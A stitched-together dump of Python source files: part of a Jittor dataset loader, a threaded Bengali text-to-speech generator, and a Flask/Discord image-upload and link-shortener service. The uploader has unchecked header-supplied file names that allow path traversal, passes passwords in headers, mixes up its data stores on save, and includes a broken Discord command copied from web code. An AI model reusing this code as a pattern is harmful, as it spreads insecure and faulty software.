* to_jittor: time of batch data to jittor variable
* recv_raw_call: total number of underlying recv_raw called
* last 10 workers: id of last 10 workers which main proc load from.
* table meaning
* ID: worker id
* wait: worker wait time
* open: worker image open time
* load: worker load time
* buffer: ring buffer status, such as how many free space, left index, right index, total size(bytes).
Example::
from jittor.dataset import Dataset
class YourDataset(Dataset):
pass
dataset = YourDataset().set_attrs(num_workers=8)
for x, y in dataset:
dataset.display_worker_status()
'''
if not hasattr(self, "workers"):
return
msg = [""]
msg.append(f"progress:{self.last_id}/{self.batch_len}")
msg.append(f"batch(s): {self.batch_time:.3f}\twait(s):{self.wait_time:.3f}")
msg.append(f"recv(s): {self.recv_time:.3f}\tto_jittor(s):{self.to_jittor_time:.3f}")
msg.append(f"last 10 workers: {self.idmap[max(0, self.last_id-9):self.last_id+1]}")
msg.append(f"ID\twait(s)\topen(s)\tload(s)\tsend(s)\ttotal(s)")
for i in range(self.num_workers):
w = self.workers[i]
s = w.status
msg.append(f"#{i}\t{s[0]:.3f}\t{s[4]:.3f}\t{s[1]:.3f}\t{s[2]:.3f}\t{s[3]:.3f}\t{w.buffer}")
LOG.i('\n'.join(msg))
def _stop_all_workers(self):
# stop workers
for w in self.workers:
w.buffer.stop()
# wait until all workers idle
if self.num_idle.value < self.num_workers:
with self.gid.get_lock():
self.gid.get_obj().value = self.batch_len
if mp_log_v:
print("idle num", self.num_idle.value)
while self.num_idle.value < self.num_workers:
self.num_idle_c.wait()
if mp_log_v:
print("idle num", self.num_idle.value)
# clean workers' buffer
for w in self.workers:
w.buffer.clear()
def _init_workers(self):
jt.clean()
jt.gc()
self.index_list = mp.Array('i', self.real_len, lock=False)
workers = []
# batch id to worker id
self.idmap = mp.Array('i', self.batch_len, lock=False)
# global token index
self.gid = mp.Value('i', self.batch_len)
# global token index condition
self.gidc = mp.Condition(self.gid.get_lock())
# number of idle workers
self.num_idle = mp.Value('i', 0, lock=False)
# number of idle workers condition
self.num_idle_c = mp.Condition(self.gid.get_lock())
for i in range(self.num_workers):
w = Worker(target=self._worker_main, args=(i,),
buffer_size=self.buffer_size,
keep_numpy_array=self.keep_numpy_array)
workers.append(w)
self.workers = workers
self.index_list_numpy = np.ndarray(dtype='int32', shape=self.real_len, buffer=self.index_list)
def reset(self):
if not hasattr(self, "workers"):
return
self._stop_all_workers()
self.terminate()
del self.index_list
del self.idmap
del self.gid
del self.gidc
del self.num_idle
del self.num_idle_c
del self.workers
del self.index_list_numpy
def __del__(self):
if mp_log_v:
print("dataset deleted")
self.terminate()
def __real_len__(self):
if self.total_len is None:
self.total_len = len(self)
return self.total_len
def __iter__(self):
if self.total_len is None:
self.total_len = len(self)
# maybe rewrite by sampler
total_len = self.total_len
if self.sampler:
index_list = list(self.sampler.__iter__())
total_len = len(index_list)
# check is not batch sampler
if len(index_list):
assert not isinstance(index_list[0], (list,tuple)), "Batch sampler not support yet."
elif self.shuffle == False:
index_list = get_order_list(self.total_len)
else:
index_list = get_random_list(self.total_len)
# scatter index_list for all mpi process
# scatter rule:
# batch 1 batch 2
# [........] [........] ...
# 00011122 00011122
# if last batch is smaller than world_size
# pad to world_size
# last batch
# [.] -> [012]
if jt.in_mpi:
world_size = mpi.world_size()
world_rank = mpi.world_rank()
index_list = np.int32(index_list)
mpi.broadcast(index_list, 0)
assert self.batch_size >= world_size, \
f"Batch size({self.batch_size}) is smaller than MPI world_size({world_size})"
real_batch_size = (self.batch_size-1) // world_size + 1
if real_batch_size * world_size != self.batch_size:
LOG.w("Batch size is not divisible by MPI world size, "
"The distributed version may be different from "
"the single-process version.")
fix_batch = total_len // self.batch_size
last_batch = total_len - fix_batch * self.batch_size
fix_batch_l = index_list[0:fix_batch*self.batch_size] \
.reshape(-1,self.batch_size)
fix_batch_l = fix_batch_l[
:,real_batch_size*world_rank:real_batch_size*(world_rank+1)]
real_batch_size = fix_batch_l.shape[1]
fix_batch_l = fix_batch_l.flatten()
if not self.drop_last and last_batch > 0:
last_batch_l = index_list[-last_batch:]
real_last_batch = (last_batch-1)//world_size+1
l = real_last_batch * world_rank
r = l + real_last_batch
if r > last_batch: r = last_batch
if l >= r: l = r-1
index_list = np.concatenate([fix_batch_l, last_batch_l[l:r]])
else:
index_list = fix_batch_l
self.real_len = len(index_list)
self.real_batch_size = real_batch_size
assert total_len // self.batch_size == \
self.real_len // self.real_batch_size, f"Number of batches({total_len // self.batch_size}!={self.real_len // self.real_batch_size}) not match, total_len: {total_len}, batch_size: {self.batch_size}, real_len: {self.real_len}, real_batch_size: {self.real_batch_size}"
else:
self.real_len = self.total_len
self.real_batch_size = self.batch_size
self.batch_len = self.__batch_len__()
if not hasattr(self, "workers") and self.num_workers:
self._init_workers()
if self.num_workers:
self._stop_all_workers()
self.index_list_numpy[:] = index_list
gid_obj = self.gid.get_obj()
gid_lock = self.gid.get_lock()
with gid_lock:
gid_obj.value = 0
self.gidc.notify_all()
start = time.time()
self.batch_time = 0
for i in range(self.batch_len):
# try not get lock first
if gid_obj.value <= i:
with gid_lock:
if gid_obj.value <= i:
if mp_log_v:
print("wait")
self.gidc.wait()
now = time.time()
self.wait_time = now - start
start = now
self.last_id = i
worker_id = self.idmap[i]
w = self.workers[worker_id]
if mp_log_v:
print(f"#{worker_id} {os.getpid()} recv buffer", w.buffer)
batch = w.buffer.recv()
now = time.time()
self.recv_time = now - start
start = now
if mp_log_v:
print(f"#{worker_id} {os.getpid()} recv", type(batch).__name__, [ type(b).__name__ for b in batch ])
batch = self.to_jittor(batch)
now = time.time()
self.to_jittor_time = now - start
start = now
yield batch
now = time.time()
self.batch_time = now - start
start = now
else:
batch_data = []
for idx in index_list:
batch_data.append(self[int(idx)])
if len(batch_data) == self.real_batch_size:
batch_data = self.collate_batch(batch_data)
batch_data = self.to_jittor(batch_data)
yield batch_data
batch_data = []
# depend on drop_last
if not self.drop_last and len(batch_data) > 0:
batch_data = self.collate_batch(batch_data)
batch_data = self.to_jittor(batch_data)
yield batch_data
class ImageFolder(Dataset):
"""
A image classify dataset, load image and label from directory::
* root/label1/img1.png
* root/label1/img2.png
* ...
* root/label2/img1.png
* root/label2/img2.png
* ...
Args::
[in] root(string): Root directory path.
Attributes::
* classes(list): List of the class names.
* class_to_idx(dict): map from class_name to class_index.
* imgs(list): List of (image_path, class_index) tuples
Example::
train_dir = './data/celebA_train'
train_loader = ImageFolder(train_dir).set_attrs(batch_size=batch_size, shuffle=True)
for batch_idx, (x_, target) in enumerate(train_loader):
...
"""
def __init__(self, root, transform=None):
super().__init__()
self.root = root
self.transform = transform
self.classes = sorted([d.name for d in os.scandir(root) if d.is_dir()])
self.class_to_idx = {v:k for k,v in enumerate(self.classes)}
self.imgs = []
image_exts = set(('.jpg', '.jpeg', '.png', '.bmp', '.tif', '.tiff'))
for i, class_name in enumerate(self.classes):
class_dir = os.path.join(root, class_name)
for dname, _, fnames in sorted(os.walk(class_dir, followlinks=True)):
for fname in sorted(fnames):
if os.path.splitext(fname)[-1].lower() in image_exts:
path = os.path.join(class_dir, fname)
self.imgs.append((path, i))
LOG.i(f"Found {len(self.classes)} classes and {len(self.imgs)} images.")
self.set_attrs(total_len=len(self.imgs))
def __getitem__(self, k):
with open(self.imgs[k][0], 'rb') as f:
img = Image.open(f).convert('RGB')
if self.transform:
img = self.transform(img)
return img, self.imgs[k][1]
|
dataGenMulti.py
|
import threading
from queue import Queue
from gtts import gTTS
import pandas as pd
LABELPATH = 'C:\\Data\\bn_bd\\line_index.tsv'
SAVEPATH = 'C:\\Data\\bn_bd\\synthWav\\'
max_threads = 100
def getWav(q):
while True:
info = q.get()
fileID = info[0]
text = info[1]
print('Requesting TTS for file: ' + fileID)
tts = gTTS(text, lang='bn')
print('TTS Complete, Saving ...')
tts.save(SAVEPATH + fileID + '_synth.wav')
print(fileID + ': Complete')
q.task_done()
que_files = Queue()
df = pd.read_csv(LABELPATH,delimiter='\t', header = None)
for i in range(max_threads -1):
t = threading.Thread(target = getWav, args = (que_files,))
t.setDaemon(True)
t.start()
for index, row in df.iterrows():
que_files.put(row)
que_files.join()
|
Image_Uploader.py
|
try:
from flask import render_template, jsonify, request, Flask, send_from_directory, redirect
import json, time, random, requests, os
import secrets
import discord
from discord.ext import commands
from discord.ext.commands import bot
import asyncio
import aiohttp
import requests
import datetime
import threading
import logging
from yaspin import yaspin
from yaspin.spinners import Spinners
from flask_basicauth import BasicAuth
import DiscordObjects
import APIkeyManagement
import shutil
import urllib
except ImportError as e:
print(u"\u001b[31mFailed to import module: '" + e.name + "'. Please make sure all dependencies that are in 'requirements.txt' are installed and try again.\u001b[0m")
exit()
spinner = yaspin()
spinner.spinner = Spinners.line
print("""
=======================
ImageUploader
Developed by
Lewis L. Foster
sniff122
V: 2.0.0
=======================
""")
try:
with open("Config.json") as f:
Config = json.load(f)
except FileNotFoundError:
print(u"\u001b[31mThe 'Config.json' file was not found, copying file from 'Config.example.json'\u001b[0m")
try:
shutil.copyfile(r"Config.example.json", r"Config.json")
except:
print(u"\u001b[31mThe 'Config.example.json' file was not found, downloading from GitHub\u001b[0m")
urllib.request.urlretrieve(
"https://raw.githubusercontent.com/sniff122Development/ImageUploader/master/Config.example.json",
"Config.json")
print(
u"\u001b[31mDone! Exiting application, please edit 'Config.json' and restart. If you need assistance, please see https://github.com/sniff122Development/ImageUploader/wiki\u001b[0m")
exit()
PROJECT_HOME = os.path.dirname(os.path.realpath(__file__))
UPLOAD_DIRECTORY = PROJECT_HOME + "/" + Config["webserver"]["upload_directory"]
CONFIG_DIRECTORY = PROJECT_HOME + "/" + Config["webserver"]["data_directory"]
if not os.path.exists(str(CONFIG_DIRECTORY)):
os.mkdir(CONFIG_DIRECTORY)
if os.path.exists(str(CONFIG_DIRECTORY + "/APIKeys.json")):
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "r") as f:
apikeys = json.load(f)
else:
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "w") as f:
f.write("{}")
f.close()
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "r") as f:
apikeys = json.load(f)
if os.path.exists(str(CONFIG_DIRECTORY + "/files.json")):
with open(str(CONFIG_DIRECTORY + "/files.json"), "r") as f:
files = json.load(f)
else:
with open(str(CONFIG_DIRECTORY + "/files.json"), "w") as f:
f.write("{}")
f.close()
with open(str(CONFIG_DIRECTORY + "/files.json"), "r") as f:
files = json.load(f)
if os.path.exists(str(CONFIG_DIRECTORY + "/shortlinks.json")):
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "r") as f:
shortlinks = json.load(f)
else:
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "w") as f:
f.write("{}")
f.close()
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "r") as f:
shortlinks = json.load(f)
def saveconfigs(keys, filetokens, shortlinks):
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "w") as f:
json.dump(keys, f, indent=4)
with open(str(CONFIG_DIRECTORY + "/files.json"), "w") as f:
json.dump(filetokens, f, indent=4)
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "w") as f:
json.dump(shortlinks, f, indent=4)
# =============================
# ==========WEBSERVER==========
# =============================
port = Config["webserver"]["port"]
listen_address = Config["webserver"]["listen"]
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = Config["webserver"]["admin_auth"]["username"]
app.config['BASIC_AUTH_PASSWORD'] = Config["webserver"]["admin_auth"]["password"]
basic_auth = BasicAuth(app)
WEBROOT = Config["webserver"]["webroot"]
RecentFile = ""
def apikeyvalid(key):
if key in apikeys:
return True
else:
return False
def checkiffileexists(filename):
if filename in shortlinks:
return True
else:
return False
@app.route("/", methods=['GET'])
def web_root():
return render_template("index.htm", uploadapi=str(WEBROOT + "/api/upload"), linkshortapi=str(WEBROOT + "/api/url"), webroot=str(WEBROOT))
@app.route("/js/<jstype>", methods=["GET"])
def return_js(jstype):
if jstype in ["admin_files.js", "admin_keys.js", "admin_links.js"]:
return send_from_directory("JS", jstype)
else:
return jsonify({"Status": 404, "Message": "Not Found"})
@app.route("/api/upload", methods=["POST"])
def upload_file():
apikey = str(request.headers.get("Auth"))
if apikeyvalid(str(apikey)):
if request.files["file"]:
uploadfile = request.files["file"]
filename = uploadfile.filename
filenamesplit = str(filename).split(".")
ext = str(filenamesplit[len(filenamesplit) - 1])
filetoken = str(secrets.token_hex(10))
while checkiffileexists(filetoken):
filetoken = str(secrets.token_hex(10))
filename = filetoken + "." + ext
savepath = os.path.join(UPLOAD_DIRECTORY, filename)
try:
uploadfile.save(savepath)
except:
os.mkdir(UPLOAD_DIRECTORY)
uploadfile.save(savepath)
apikeys[apikey]["file-names"].append(filename)
files[filename] = apikey
saveconfigs(apikeys, files, shortlinks)
if Config["bot"]["Enabled"] == "True":
embed = DiscordObjects.DiscordEmbed(title="New Image Uploaded", description="There is a new image!",
footer=DiscordObjects.EmbedFooter(""), colour=0xffffff,
image=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)),
author=DiscordObjects.EmbedAuthor("ImageUploader"), fields=[
DiscordObjects.EmbedField(name="URL:", value=str("https://" + request.headers['Host'] + "/uploads/" + filename),
inline=False)], thumbnail=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)))
webhookcontent = DiscordObjects.DiscordWebhookContent(username="ImageUploader",
avatar_url=Config["bot"]["webhook"]["avatar_url"],
tts=False, embed=[embed])
DiscordObjects.WebhookPost(Config["bot"]["webhook"]["url"], webhookcontent)
global RecentFile
RecentFile = str("https://" + request.headers['Host'] + "/uploads/" + filename)
return jsonify({"Status": 200, "Message": "OK", "FileLink": str("https://" + request.headers['Host'] + "/uploads/" + filename)})
else:
return jsonify({"Status": 403, "Message": "Forbidden - No file provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/url", methods=["POST"])
def shorten_link():
apikey = str(request.headers.get("Auth"))
if apikeyvalid(apikey):
url = str(request.headers.get("url"))
if url:
exists = False
for urlid in shortlinks:
if url == shortlinks[urlid]:
exists = True
break
else:
continue
if not exists:
urlid = str(secrets.token_hex(4))
while urlid in shortlinks:
urlid = str(secrets.token_hex(4))
try:
apikeys[apikey]["short-urls"].append(urlid)
except:
apikeys[apikey]["short-urls"] = [urlid]
shortlinks[urlid] = {"url": url, "key": apikey}
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "shorturl": str("https://" + request.headers['Host'] + "/link/" + urlid)})
else:
return jsonify({"Status": 403, "Message": "Forbidden - No url provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/uploads/<file>", methods=['GET'])
def get_file(file):
try:
try:
check = files[file]
except KeyError:
return jsonify({"Status": 404, "Message": "Not Found"})
return send_from_directory(UPLOAD_DIRECTORY, file)
except:
return jsonify({"Status": 500, "Message": "Internal Server Error"})
@app.route("/link/<link>", methods=["GET"])
def get_link(link):
try:
if link in shortlinks:
return redirect(shortlinks[link]["url"])
else:
return jsonify({"Status": 404, "Message": "Not Found"})
except:
return jsonify({"Status": 500, "Message": "Internal Server Error"})
# ==WEBSERVER=ADMIN==
@app.route("/admin", methods=['GET'])
@basic_auth.required
def admin_root():
return render_template("admin.htm",
webroot=WEBROOT,
recentfile=RecentFile)
@app.route("/api/admin/listfiles", methods=["GET"])
def admin_get_files():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
filelist = []
for filename in files:
filelist.append(filename)
return jsonify({"Status": 200, "Message": "Ok", "files": filelist})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/listlinks", methods=["GET"])
def admin_get_links():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
linklist = []
for linkid in shortlinks:
linklist.append(linkid)
return jsonify({"Status": 200, "Message": "Ok", "links": linklist})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/uploadfile", methods=["POST"])
def admin_upload_file():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
if request.files["file"]:
filename = str(request.headers.get('FileName'))
file = request.files["file"]
savepath = os.path.join(UPLOAD_DIRECTORY, filename)
file.save(savepath)
apikeys[apikey]["file-names"].append(filename)
files[filename] = apikey
saveconfigs(apikeys, files, shortlinks)
if Config["bot"]["Enabled"] == "True":
embed = DiscordObjects.DiscordEmbed(title="New Image Uploaded", description="There is a new image!",
footer=DiscordObjects.EmbedFooter("There be a new image!"),
colour=0xffffff, image=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)), author=DiscordObjects.EmbedAuthor("ImageUploader"),
fields=[DiscordObjects.EmbedField(name="URL:", value=str(
"https://" + request.headers['Host'] + "/uploads/" + filename), inline=False)],
thumbnail=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)))
webhookcontent = DiscordObjects.DiscordWebhookContent(username="ImageUploader",
avatar_url=Config["bot"]["webhook"]["avatar_url"],
tts=False, embed=[embed])
DiscordObjects.WebhookPost(Config["bot"]["webhook"]["url"], webhookcontent)
global RecentFile
RecentFile = str("https://" + request.headers['Host'] + "/uploads/" + filename)
return jsonify({"Status": 200, "Message": "OK", "FileLink": str("https://" + request.headers['Host'] + "/uploads/" + filename)})
else:
return jsonify({"Status": 403, "Message": "Forbidden", "Extra Info": "No File Prodived"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/url", methods=["POST"])
def admin_new_url():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
url = str(request.headers.get("url"))
if url:
try:
index = apikeys[apikey]["short-urls"].index(request.headers.get("id"))
return jsonify({"Status": 403, "Message": "Forbidden - Link ID already exists"})
except:
try:
apikeys[apikey]["short-urls"].append(request.headers.get("id"))
except:
apikeys[apikey]["short-urls"] = [request.headers.get("id")]
shortlinks[request.headers.get("id")] = {"url": url, "key": apikey}
saveconfigs(apikeys, files, shortlinks)
return jsonify(
{"Status": 200, "Message": "OK", "shorturl": str("https://" + request.headers['Host'] + "/link/" + request.headers.get("id"))})
else:
return jsonify({"Status": 403, "Message": "Forbidden - No url provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/deletefile", methods=["DELETE"])
def admin_delete_file():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
filename = str(request.headers.get("filename"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
oldpath = os.path.join("data", "uploads", filename)
os.remove(oldpath)
apikey = files[filename]
del files[filename]
fileindex = apikeys[apikey]["file-names"].index(filename)
del apikeys[apikey]["file-names"][fileindex]
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK"})
except FileNotFoundError:
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/deletelink", methods=["DELETE"])
def admin_delete_link():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
lid = str(request.headers.get("id"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
apikey = shortlinks[lid]["key"]
del shortlinks[lid]
linkindex = apikeys[apikey]["short-urls"].index(lid)
del apikeys[apikey]["short-urls"][linkindex]
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK"})
except KeyError:
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/renamefile", methods=["PUT"])
def admin_rename_file():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
oldfilename = str(request.headers.get("oldfilename"))
newfilename = str(request.headers.get("newfilename"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
oldpath = os.path.join(UPLOAD_DIRECTORY, oldfilename)
newpath = os.path.join(UPLOAD_DIRECTORY, newfilename)
os.rename(oldpath, newpath)
apikey = files[oldfilename]
del files[oldfilename]
files[newfilename] = apikey
fileindex = apikeys[apikey]["file-names"].index(oldfilename)
del apikeys[apikey]["file-names"][fileindex]
apikeys[apikey]["file-names"].append(newfilename)
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "NewLink": f"{WEBROOT}/uploads/{newfilename}"})
except FileNotFoundError:
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/renamelink", methods=["PUT"])
def admin_rename_link():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
oldid = str(request.headers.get("oldid"))
newid = str(request.headers.get("newid"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
oldobj = shortlinks[oldid]
del shortlinks[oldid]
shortlinks[newid] = oldobj
fileindex = apikeys[apikey]["short-urls"].index(oldid)
apikeys[apikey]["short-urls"].pop(fileindex)
apikeys[apikey]["short-urls"].append(newid)
saveconfigs(apikeys, shortlinks, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "NewLink": f"{WEBROOT}/uploads/{newid}"})
except Exception as e:
print(e)
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/newkey", methods=["GET"])
def admin_new_key():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
name = str(request.headers.get("name"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
try:
changes = APIkeyManagement.genkey(name, apikeys)
apikeys.update(changes["apikeys"])
newkey = changes["newkey"]
saveconfigs(apikeys, shortlinks, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "newkey": newkey})
except Exception as e:
print(e)
return jsonify({"Status": 500, "Message": "Internal Server Error"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/revokekey", methods=["DELETE"])
def admin_revoke_key():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
key = str(request.headers.get("key"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
try:
changes = APIkeyManagement.revokekey(key, apikeys)
apikeys.update(changes)
saveconfigs(apikeys, shortlinks, shortlinks)
return jsonify({"Status": 200, "Message": "OK"})
except:
return jsonify({"Status": 500, "Message": "Internal Server Error"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
# ==WEBSERVER=ADMIN==
def flask_thread():
try:
app.run(host=listen_address, port=port)
except:
print(u"\u001b[31mFailed to start webserver. Make sure you are authorized to listen to port " + str(
port) + " on " + str(listen_address) + " and try rerunning the application.\u001b[0m")
raise
x = threading.Thread(target=flask_thread)
x.start()
# =============================
# ==========WEBSERVER==========
# =============================
# ===========DISCORD===========
# =============================
def UserIsAuthorised(ctx):
if ctx.message.author.id in Config["bot"]["AuthUsers"]:
return True
else:
return False
bot = commands.Bot(Config["bot"]["prefix"])
@bot.event
async def on_ready():
spinner.stop()
activity = discord.Activity(name=Config["bot"]["playingstatus"], type=discord.ActivityType.watching)
await bot.change_presence(activity=activity)
AuthUsers = ""
for person in Config["bot"]["AuthUsers"]:
AuthUsers = AuthUsers + ", " + str(person)
AuthUsers = AuthUsers[2:]
ping = bot.latency
ping = ping * 1000
ping = round(ping, 2)
print(f"""
=========================================
Discord connected!
Discord Info:
Ping: {ping}
Username: {bot.user.name}
User ID: {bot.user.id}
Authorised User IDs: {AuthUsers}
=========================================
""")
@bot.group(name="files")
@commands.check(UserIsAuthorised)
async def __files_command_group__(ctx):
if ctx.invoked_subcommand is __files_command_group__:
embed = discord.Embed(title="Unknown or No Files Subcommand Passed",
description="You did not provide a known subcommand for the `files` command group, please use the help command for a list of subcommands.",
colour=0xff0000)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__files_command_group__.command(name="recent")
@commands.check(UserIsAuthorised)
async def __recent_file_command__(ctx):
try:
embed = discord.Embed(title="Most Recent File Uploaded",
description="The most recent file uploaded to the webserver. If an image does not embed, the file must not mave been an image.")
embed.add_field(name="File Link", value=RecentFile, inline=False)
if RecentFile == "":
raise TypeError
embed.set_image(url=RecentFile)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except TypeError:
await ctx.send("No files have been uploaded since ImageUploader started")
@__files_command_group__.command(name="rename")
@commands.check(UserIsAuthorised)
async def __rename_file__(ctx, currentfile: str, newfile: str):
try:
oldpath = os.path.join("data", "uploads", currentfile)
newpath = os.path.join("data", "uploads", newfile)
os.rename(oldpath, newpath)
apikey = shortlinks[currentfile]
del shortlinks[currentfile]
shortlinks[newfile] = apikey
fileindex = apikeys[apikey]["file-names"].index(currentfile)
del apikeys[apikey]["file-names"][fileindex]
apikeys[apikey]["file-names"].append(newfile)
saveconfigs(apikeys, shortlinks, shortlinks)
embed = discord.Embed(title="The file was renamed", colour=0x00ff00)
embed.add_field(name=f"{WEBROOT}/uploads/{currentfile}", value=f"{WEBROOT}/uploads/{newfile}")
embed.set_image(url=f"{WEBROOT}/uploads/{newfile}")
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except FileNotFoundError:
embed = discord.Embed(title="File not found",
description="The filename you have given was not found, please check the filename",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__files_command_group__.command(name="delete")
@commands.check(UserIsAuthorised)
async def __delete_file__(ctx, deletefile: str):
try:
oldpath = os.path.join("data", "uploads", deletefile)
os.remove(oldpath)
apikey = shortlinks[deletefile]
del shortlinks[deletefile]
fileindex = apikeys[apikey]["file-names"].index(deletefile)
del apikeys[apikey]["file-names"][fileindex]
embed = discord.Embed(title="The file was removed", description="The file name you provided was removed.",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except FileNotFoundError:
embed = discord.Embed(title="File not found",
description="The filename you have given was not found, please check the filename",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@bot.group(name="links")
@commands.check(UserIsAuthorised)
async def __links_command_group__(ctx):
if ctx.invoked_subcommand is __files_command_group__:
embed = discord.Embed(title="Unknown or No Links Subcommand Passed",
description="You did not provide a known subcommand for the `links` command group, please use the help command for a list of subcommands.",
colour=0xff0000)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__links_command_group__.command(name="create")
@commands.check(UserIsAuthorised)
async def __create_link_command__(ctx):
try:
embed = discord.Embed(title="Most Recent File Uploaded",
description="The most recent file uploaded to the webserver. If an image does not embed, the file must not mave been an image.")
embed.add_field(name="File Link", value=RecentFile, inline=False)
if RecentFile == "":
raise TypeError
embed.set_image(url=RecentFile)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except TypeError:
await ctx.send("No files have been uploaded since ImageUploader started")
@__links_command_group__.command(name="rename")
@commands.check(UserIsAuthorised)
async def __rename_link__(ctx, currentfile: str, newfile: str):
try:
index = apikeys[apikey]["short-urls"].index(request.headers.get("id"))
return jsonify({"Status": 403, "Message": "Forbidden - Link ID already exists"})
except:
try:
apikeys[apikey]["short-urls"].append(request.headers.get("id"))
except:
apikeys[apikey]["short-urls"] = [request.headers.get("id")]
shortlinks[request.headers.get("id")] = {"url": url, "key": apikey}
saveconfigs(apikeys, files, shortlinks)
return jsonify(
{"Status": 200, "Message": "OK", "shorturl": str(WEBROOT + "/link/" + request.headers.get("id"))})
@__links_command_group__.command(name="delete")
@commands.check(UserIsAuthorised)
async def __delete_link__(ctx, deletefile: str):
try:
oldpath = os.path.join("data", "uploads", deletefile)
os.remove(oldpath)
apikey = shortlinks[deletefile]
del shortlinks[deletefile]
fileindex = apikeys[apikey]["file-names"].index(deletefile)
del apikeys[apikey]["file-names"][fileindex]
embed = discord.Embed(title="The file was removed", description="The file name you provided was removed.",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except FileNotFoundError:
embed = discord.Embed(title="File not found",
description="The filename you have given was not found, please check the filename",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@bot.group(name="key")
@commands.check(UserIsAuthorised)
async def __apikey_command_group__(ctx):
if ctx.invoked_subcommand is __files_command_group__:
embed = discord.Embed(title="Unknown or No API Key Management Subcommand Passed",
description="You did not provide a known subcommand for the `key` command group, please use the help command for a list of subcommands.",
colour=0xff0000)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__apikey_command_group__.command(name="generate")
